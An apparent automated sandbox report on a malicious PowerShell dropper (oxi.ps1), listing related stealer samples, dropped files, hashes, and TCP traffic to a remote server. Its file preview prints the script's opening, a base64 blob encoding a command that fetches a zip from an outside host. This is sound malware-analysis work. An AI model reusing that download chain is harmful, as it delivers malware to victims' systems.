              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              3b5074b1b5d032e5620f69f9f700ff0ehttp://see-track.com/Get hashmaliciousUnknownBrowse
              • 167.235.238.203
              Doc_10577030xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 167.235.238.203
              http://154.29.75.236Get hashmaliciousUnknownBrowse
              • 167.235.238.203
              kam.vbsGet hashmaliciousUnknownBrowse
              • 167.235.238.203
              las.vbsGet hashmaliciousUnknownBrowse
              • 167.235.238.203
              upload.vbsGet hashmaliciousUnknownBrowse
              • 167.235.238.203
              Copy#51007602.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 167.235.238.203
              yk4ABozmBY.exeGet hashmaliciousRedLineBrowse
              • 167.235.238.203
              Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 167.235.238.203
              0000003448.pdf.exeGet hashmaliciousAgentTeslaBrowse
              • 167.235.238.203

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\downloads\Autoit3.exeOSE - PO & FCST - ___-LT24052303183991-01.exeGet hashmaliciousRemcosBrowse
                file.exeGet hashmaliciousVidarBrowse
                  umkglnks.ps1Get hashmaliciousDarkGate, MailPassViewBrowse
                    1.htaGet hashmaliciousDarkGate, MailPassViewBrowse
                      AutoIt_Dropper.exeGet hashmaliciousUnknownBrowse
                        AutoIt_Dropper.exeGet hashmaliciousUnknownBrowse
                          08-May-24-document-38438dbb.jarGet hashmaliciousDarkGate, MailPassViewBrowse
                            08-May-24-document-38438dbb.jarGet hashmaliciousDarkGate, MailPassViewBrowse
                              yyyyyyyyyyyy.msgGet hashmaliciousDarkGate, MailPassViewBrowse
                                Phish Alert EXTERNAL SUSPECTED SPAM Re RFQ for SMART 924.msgGet hashmaliciousDarkGate, MailPassViewBrowse

                                  Created / dropped Files

                                  C:\ProgramData\kkdbffb\cehaheb

                                  Download File
                                  Process:C:\Windows\SysWOW64\cmd.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):42
                                  Entropy (8bit):2.9625983186791407
                                  Encrypted:false
                                  SSDEEP:3:Qh9eolFl+KQFltYn:Q7eY+H2n
                                  MD5:78962895178327D50EBFC5D7249F00C0
                                  SHA1:32695F4C78C6428A570B9EA30F54C7CB8DF84E9C
                                  SHA-256:058BDCFD2A3BCC6D12E2BC797C3CF818666B9EA192162991F48F86653198EB5D
                                  SHA-512:6D61EBE2C7CE94124288A1FE1085AFBC1C921C3814BCD394D397C8EEF0A7043F934CA250FF4192C7D456191BF4EA95F02E30AE880324BE86C889BCCADA180E5F
                                  Malicious:false
                                  Reputation:low
                                  Preview:..D.o.m.a.i.n. . .....w.A.c.2.O. . . .....

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1744
                                  Entropy (8bit):5.371786303518436
                                  Encrypted:false
                                  SSDEEP:48:tSU4y4RQmFoUeCamfm9qr9tK8NfUNkw6nUZ49ER/G+RKw:EHyIFKL2O9qr2KfJwf5nP
                                  MD5:676D0B6FFC5872EC4168B4222E7BD9C6
                                  SHA1:90645B3DF9F77A89BCAC3DE41CC785F235090C10
                                  SHA-256:5EA452F6E1E1D78FC486B7A803B442AF6E67C6256FE5309B5475C32A5484815E
                                  SHA-512:57C98AFF48234AE9EB8D3B53E77C958E8FB755C25CD002F9A7D994A20FC03EC0A6CB21CC0593F9A2DBD761FA7601D576221737549A179BAE3419D38D3A5FCB0B
                                  Malicious:false
                                  Reputation:low
                                  Preview:@...e...........)... ................................@..........@...............|.jdY\.H.s9.!..|(.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agh0ij5h.omq.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czenej3t.2ah.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkertzrr.42t.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgbdsv5s.xjw.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Roaming\HdaEKeA

                                  Download File
                                  Process:C:\downloads\Autoit3.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):32
                                  Entropy (8bit):3.6167292966721747
                                  Encrypted:false
                                  SSDEEP:3:Dm3N65L/DjAaCN:7ZDjAaCN
                                  MD5:45D97490CD299A3AE4D58E6C68FC11F1
                                  SHA1:1F3FB31C08EEA1FDB68786E9DEB18BECC3C16BE7
                                  SHA-256:D35EEC6EE290BFA7655624538E6ABE2C6406D2B69B76FB5032068D4DEF80265E
                                  SHA-512:8139E212D0DEA16B9585D48B7C43AAD577CE4D613497BB9AF247D380B58C45DF8EF64F116393ECBAA57DB054CA9E2898B70D82F69DB7E079ABFBB38AADEB25DA
                                  Malicious:false
                                  Preview:EcCdAahBABEGcFeFFcahHfBFBeGEcbGh

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7387171969118076
                                  Encrypted:false
                                  SSDEEP:96:wQyyyk33CxH3NlBkvhkvCCtfEtqaYlbHIEtqajlbHf:wQyyykyXNvfEtWiEtpp
                                  MD5:9E2B8621C070F4E9598C9B91A970DFF3
                                  SHA1:326B33AFEC0500086B44B901096331C25761B577
                                  SHA-256:E06B1175966F671202E2AA752F99608E549BAD2FE42EF9ABEFC4A44D2BA4FCEE
                                  SHA-512:62FBC14E82EF08BC24E50BC4F0AE6D98B67DC6E6917631F837FB334F0DFD241EDDB18BC714B98FF5D00F016AAADD80AE945AB98DA77227DC0980F4712E3681BB
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v.......R...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......R...:e..R.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X.............................X..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................h...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X......Q...........

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QKOJIP9LS64FACZEJGLE.temp

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7387171969118076
                                  Encrypted:false
                                  SSDEEP:96:wQyyyk33CxH3NlBkvhkvCCtfEtqaYlbHIEtqajlbHf:wQyyykyXNvfEtWiEtpp
                                  MD5:9E2B8621C070F4E9598C9B91A970DFF3
                                  SHA1:326B33AFEC0500086B44B901096331C25761B577
                                  SHA-256:E06B1175966F671202E2AA752F99608E549BAD2FE42EF9ABEFC4A44D2BA4FCEE
                                  SHA-512:62FBC14E82EF08BC24E50BC4F0AE6D98B67DC6E6917631F837FB334F0DFD241EDDB18BC714B98FF5D00F016AAADD80AE945AB98DA77227DC0980F4712E3681BB
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v.......R...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......R...:e..R.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X.............................X..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................h...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X......Q...........

                                  C:\downloads\Autoit3.exe

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):893608
                                  Entropy (8bit):6.620131693023677
                                  Encrypted:false
                                  SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                  MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                  SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                  SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                  SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 3%
                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                  Joe Sandbox View:
                                  • Filename: OSE - PO & FCST - ___-LT24052303183991-01.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: umkglnks.ps1, Detection: malicious, Browse
                                  • Filename: 1.hta, Detection: malicious, Browse
                                  • Filename: AutoIt_Dropper.exe, Detection: malicious, Browse
                                  • Filename: AutoIt_Dropper.exe, Detection: malicious, Browse
                                  • Filename: 08-May-24-document-38438dbb.jar, Detection: malicious, Browse
                                  • Filename: 08-May-24-document-38438dbb.jar, Detection: malicious, Browse
                                  • Filename: yyyyyyyyyyyy.msg, Detection: malicious, Browse
                                  • Filename: Phish Alert EXTERNAL SUSPECTED SPAM Re RFQ for SMART 924.msg, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                  C:\downloads\TU.zip

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                  Category:dropped
                                  Size (bytes):787241
                                  Entropy (8bit):7.998330242391652
                                  Encrypted:true
                                  SSDEEP:24576:0sJBgav2i0qpqYBEmjXMNQjzpb57QU8ONZ:0sP7v2WdBEe4UFNZ
                                  MD5:763D557C3E4C57F7D6132A444A930386
                                  SHA1:77AAF9C8B944F7178067430AEF42F60A2AC1F41C
                                  SHA-256:5316FC2CB4C54BA46A42E77E9EE387D158F0F3DC7456A0C549F9718B081C6C26
                                  SHA-512:B3BC950079330BCF31490EB704F712A99E1832AD931E3905132425F957AE1EF4509FD4B6075A0CB001843CAD07650CFEA65DC678EB323400593EE983F46FA4AB
                                  Malicious:false
                                  Preview:PK.........!.X...v............Autoit3.exe..}|SE.8..$.m...R.J.UQ...5.)m."-... .E.Z#*BB.....^.........(..-EZ.y.......T-ZK....s.&-...>.....+L...>g...3yw..L. ..4M.6...!......0..w....}|..C..WL.x`^....?.......$.s_.\..I.<..9. .Gf.w......<...\1...[#.>cG...;......e..Z..G...sG.....G.tznl...#Z.Z.o.~is..B|...?A....O.~....?po......r.B.!F.......;&\i.`...j..."...3...}.x....b...F.B.@......Q...}F...s...........|X<Px-..s..k....~B..a....?o,..>......*.<....+.m...S.f.8w....a..F.....87c(.q#.&x.c...dx.0..x.7.7.^...y.....c.c~s.......@........'......m.;WP...$T(.3.u..FaZ..3. T...&..e".<...Q@........Wc..<......5..P@.z.3..o.9}...l..+.3......v9d....A..e.....y....N.......{1....Q.ASn6@.1.}.Bw..WPT.N..N.l...K...v...`.&,.50q........g.Y..5.0..m+..E......b..L...A$.2...Z.Z.R...&(.IJi.......+......J....d.*Y.%k..5U..d.T.f.. .{....C......K.-......qB@].CM.1.6+TV^...4[...?j.M...e1.NY<.~=.[E...[..M.}.o...[.,^E.......%.}.~...Z..J.....~..m._...tzk!....8..&../..bE&<7..zU...[-.rM.&ie3....k

                                  C:\downloads\script.a3x

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):560804
                                  Entropy (8bit):6.913976402760439
                                  Encrypted:false
                                  SSDEEP:12288:NeZu+gIZHxCQ4bamk1FNTVRppgU+ehWwhz5u6+c5zzq:VqRCQ4RU7ppgK35t+cdO
                                  MD5:DFA96717B69FA69D264A60B9DE36F078
                                  SHA1:B18DD41BCDC7A75A4B505CBDFB337CF19A2934D8
                                  SHA-256:493FB733897F4C3D7ADF01D663E711E2E47240BFDF5B99ABD230AA809F43A8CF
                                  SHA-512:5772CDAC81361297D72F620E23068DA8180FCE09935340CAAF279B6719F446AD3FD85DFC3004258E943092A73F914B84F9A12EF85630AC32410D1A7DDD3B41C7
                                  Malicious:false
                                  Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M........+..M...F.f.q..R,..].>>.r.nw.i@.../9...w.6..;..$dr..yO.n....-.....qH..O....?@....L.9"...]g....~.t_.1N(...+..............'......>'......>kC.R......%x....}...q..U-...(....%....V..?p.h.....l)".N.#.R......v.k@3.Q..\...I.h...%D'7...Y.....6(..)w....+...........7.`....8.u....h..0p.R%. /....^,.B..=H.{.X.....t....f.. b..'......>'......>m.........8.5...x...(.U?j....$.1.#.~.\......<.iw..}.k.5-|...d..6c)*.&......a.X9.v..*.q..W@3X-......O..m......ik...x(....6.y`xx.....C\%.r...!...piR.-..Q..=.7...P..,...J.).oO..]......F<.4,...JPZ..;.S..q,......iv.2I..a.5....>...P....X.,hj..&._<......x......,.n..8...X|&..{..K.{...).....I.. u..J....R:.......u...b....p.\q..PIgPm..6.{.9..x......P.......`..7..`..0.F..t..l...w...y.:..F&[.R$3..,.X.o#)..X...ce..Z...h.VZ.%]v.......+.........%;...:...Nu.z.k.vn1?h.6....L.?E..I..d..Q..!....7m.....t.?l...u.!'?%...QK...W5..L}

                                  Static File Info

                                  General

                                  File type:ASCII text, with very long lines (717)
                                  Entropy (8bit):5.917642981233913
                                  TrID:
                                    File name:oxi.ps1
                                    File size:865 bytes
                                    MD5:f391262039244472c29e2b3b788a4a79
                                    SHA1:b6db78ac395a0191883670595a88bd0fa52a87f8
                                    SHA256:d28c416add7fe55e7b1a20e30013e870cfb2eb3c9a5962ed4047766a43fa4f5e
                                    SHA512:5797b2175e4a9cba73c8ddda42968a4536eb3716e90f8038ce774d45ca8e65ba749cca94010954f841b3292a65c591b2b2ccb94f44af857ff2d7786a709f6d06
                                    SSDEEP:24:U5ahn9DiR2wWtlVZBJqAsG8LrZHDPQE6R18YBH2MTt9N7Lw1PKC2V8g:UKnvVZiG8xHDQEit1u1P3U
                                    TLSH:371196499FBF1D0AF9404530BBA8D965965C0555748C2D07BB04F68347C5C4E7BBF11C
                                    File Content Preview:ipconfig /flushdns..$base64 = "JHZwID0gImh0dHBzOi8va29zdHVtbjEuaWxhYnNlcnZlci5jb20vMS56aXAiOw0KJGJlID0gImM6XFxkb3dubG9hZHMiOw0KTmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVBhdGggJGJlOw0KSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdnAgLU91dEZpbGUgJGJlXFRVLnppcDsN

                                    File Icon

                                    Icon Hash:3270d6baae77db44

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    May 27, 2024 18:28:58.639189005 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:58.639219999 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:58.639286995 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:58.658905029 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:58.658922911 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.342791080 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.343122005 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.347573996 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.347584009 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.348084927 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.358757973 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.406497955 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.617794991 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.659836054 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.717294931 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.717328072 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.717345953 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.717374086 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.717389107 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.717394114 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.717413902 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.717426062 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.717451096 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.717452049 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.717497110 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.722327948 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.722378016 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.722404957 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.722418070 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.722441912 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.722450972 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.814213991 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.814325094 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.814403057 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.814433098 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.814448118 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.814477921 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.819106102 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.819152117 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.819188118 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.819195032 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.819221020 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.819233894 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.822675943 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.822725058 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.822750092 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.822756052 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.822788954 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.822802067 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.827676058 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.827728033 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.827771902 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.827780008 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.827821970 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.827841043 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.913652897 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.913721085 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.913760900 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.913777113 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.913811922 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.913824081 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.917529106 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.917579889 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.917622089 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.917629957 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.917664051 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.917679071 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.920706034 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.920751095 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.920784950 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.920792103 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.920819998 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.920833111 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.923902035 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.923944950 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.923979998 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.923986912 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.924016953 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.924031973 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.926378965 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.926424980 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.926460981 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.926466942 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:28:59.926505089 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:28:59.926516056 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.000696898 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.000776052 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.000816107 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.000832081 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.000844955 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.000876904 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.003865957 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.003916025 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.003935099 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.003942966 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.003971100 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.003988981 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.009603977 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.009671926 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.009702921 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.009708881 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.009746075 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.009752989 CEST49730443192.168.2.4167.235.238.203
